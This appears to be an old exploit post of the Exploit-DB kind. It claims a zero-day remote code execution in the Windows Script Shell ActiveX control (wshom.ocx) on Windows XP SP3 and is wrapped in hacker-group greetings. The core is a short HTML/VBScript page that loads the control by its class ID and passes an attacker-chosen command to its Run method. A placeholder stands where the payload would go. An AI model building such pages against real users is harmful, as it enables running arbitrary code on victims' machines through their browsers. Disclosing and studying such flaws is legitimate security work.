##################################{In The Name Of Allah The Mercifull}###################### # Title : Windows Script.Shell.1 (V 1.0) (wshom.ocx) 0day suffer from ActiveX Remote Code Execution? # Tested : Windows xp (sp3) ## ## Author : R3d-D3v!L <X[at]hotmail.co.jp> # Credits to : XP10_HACKER ((XP10.ME-xp10.com)) ## ## Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah& Abo-ShA@D ## ## ## all member at XP10.com ## ######################################################## ## infected bath : WINDOWS\system32\wshom.ocx infected Function : Function Exec ( ByVal Command As String ) As IWshExec & Function Run ( ByVal Command As String , [ ByRef WindowStyle As Variant ] , [ ByRef WaitOnReturn As Variant ] ) As Long in (Exec & Run) in IWshShell3 EXPLO!T: <html> </font></b></p> <p> <object classid='clsid:F935DC20-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object> <script language='vbscript'> arg1=" TYPE YOUR EV!L Code Execution? " target.run arg1 </script></p> [~]-----------------------------{((MAGOUSH-87))}------------------------------------------------# # [~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] # # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # # [~] spechial thanks : ((HITLER JEDDAH & abo-shahd & DR.DAShER & abo-hlil)) # # [?]spechial SupP0RT : MY M!ND # &#169; Offensive Security # # [~]spechial FR!ND: JUPA # # [~] !'M 4R48!4N 3XPL0!73R. # # [~]{[(D!R 4ll 0R D!E)]}; # # [~]---------------------------------------------------------------------------------------------